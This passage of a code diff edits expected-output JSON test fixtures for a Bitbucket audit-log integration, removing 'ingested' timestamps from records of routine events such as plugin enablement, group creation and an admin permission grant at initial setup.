enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-ao-common\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-ao-common\"}]}", "type": "info", "kind": "event" @@ -8937,7 +8782,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867834487Z", "original": "{\"timestamp\":\"2021-11-27T17:29:05.892Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.auiplugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"9.3.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.auiplugin\"}]}", "type": "info", "kind": "event" @@ -8991,7 +8835,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867835670Z", "original": "{\"timestamp\":\"2021-11-27T17:29:03.203Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.audit.atlassian-audit-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.12.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.audit.atlassian-audit-plugin\"}]}", "type": "info", "kind": "event" @@ -9045,7 +8888,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867836669Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.812Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.atlassian-failure-cache-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.atlassian-failure-cache-plugin\"}]}", "type": "info", "kind": "event" @@ -9099,7 +8941,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867837582Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.809Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-trustedapps-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-trustedapps-plugin\"}]}", "type": "info", "kind": "event" @@ -9153,7 +8994,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867838531Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.796Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-oauth-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-oauth-plugin\"}]}", "type": "info", "kind": "event" @@ -9207,7 +9047,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867839477Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.529Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.consumer.sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.consumer.sal\"}]}", "type": "info", "kind": "event" @@ -9261,7 +9100,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867840369Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.528Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-cors-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-cors-plugin\"}]}", "type": "info", "kind": "event" @@ -9315,7 +9153,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867841269Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.521Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-basicauth-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-basicauth-plugin\"}]}", "type": "info", "kind": "event" @@ -9369,7 +9206,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867842296Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-plugin\"}]}", "type": "info", "kind": "event" @@ -9423,7 +9259,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867843535Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.050Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.atlassian-oauth-service-provider-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.atlassian-oauth-service-provider-spi\"}]}", "type": "info", "kind": "event" @@ -9477,7 +9312,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867844431Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.049Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bundles.json-20070829.0.0.1\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"20070829.0.0.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bundles.json-20070829.0.0.1\"}]}", "type": "info", "kind": "event" @@ -9531,7 +9365,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867845343Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.047Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.atlassian-oauth-consumer-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.atlassian-oauth-consumer-spi\"}]}", "type": "info", "kind": "event" @@ -9585,7 +9418,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867846295Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.047Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.springsource.org.jdom-1.1.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.springsource.org.jdom-1.1.0\"}]}", "type": "info", "kind": "event" @@ -9639,7 +9471,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867847185Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.046Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.analytics.analytics-whitelist\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.84\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.analytics.analytics-whitelist\"}]}", "type": "info", "kind": "event" @@ -9693,7 +9524,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867848118Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.043Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.analytics.analytics-client\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.2.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.analytics.analytics-client\"}]}", "type": "info", "kind": "event" @@ -9747,7 +9577,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867849161Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.763Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.rest.atlassian-rest-module\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.0.7\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.rest.atlassian-rest-module\"}]}", "type": "info", "kind": "event" @@ -9801,7 +9630,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867850093Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.746Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.templaterenderer.atlassian-template-renderer-velocity1.6-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.templaterenderer.atlassian-template-renderer-velocity1.6-plugin\"}]}", "type": "info", "kind": "event" @@ -9855,7 +9683,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867851123Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.736Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.activeobjects.activeobjects-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.2.11\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.activeobjects.activeobjects-plugin\"}]}", "type": "info", "kind": "event" @@ -9909,7 +9736,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867852081Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.687Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.templaterenderer.api\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.templaterenderer.api\"}]}", "type": "info", "kind": "event" @@ -9963,7 +9789,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.displaynamechanged", - "ingested": "2021-12-24T00:37:18.867852983Z", "original": "{\"timestamp\":\"2021-11-27T17:26:26.205Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.displaynamechanged\",\"action\":\"Server name changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"bitbucket.service.applicationconfiguration.audit.changedvalue.displaynamechanged.name\",\"to\":\"Bitbucket\"}],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":\\\"Bitbucket\\\",\\\"old\\\":null}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"DISPLAY_NAME\"}]}", "type": "info", "kind": "event" @@ -10018,7 +9843,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:18.867853873Z", "original": "{\"timestamp\":\"2021-11-27T17:26:25.141Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"action\":\"User group created\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", @@ -10079,7 +9903,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.directorycreated", - "ingested": "2021-12-24T00:37:18.867854768Z", "original": "{\"timestamp\":\"2021-11-27T17:26:25.045Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.directorycreated\",\"action\":\"User directory created\"},\"affectedObjects\":[],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.directory.name\",\"name\":\"Directory name\",\"value\":\"Bitbucket Internal Directory\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Bitbucket Internal Directory\"}]}", "type": "info", "kind": "event" diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index d2bc3605491..e3b59455ae0 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -68,7 +68,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020767419Z", "original": "{\"affectedObjects\":[{\"id\":\"stash-users\",\"name\":\"stash-users\",\"type\":\"GROUP\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"stash-users\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"stash-users\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"admin\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034465,\"nano\":313000000},\"version\":\"1.0\"}", "type": [ "group", @@ -157,7 +156,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020770621Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Global permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"SYS_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Global\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":19000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -232,7 +230,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongranted", - "ingested": "2021-12-24T00:37:41.020771462Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Global permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"SYS_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Global\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":108000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -295,7 +292,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.applicationsetup", - "ingested": "2021-12-24T00:37:41.020772222Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Instance setup completed\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.applicationsetup\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global 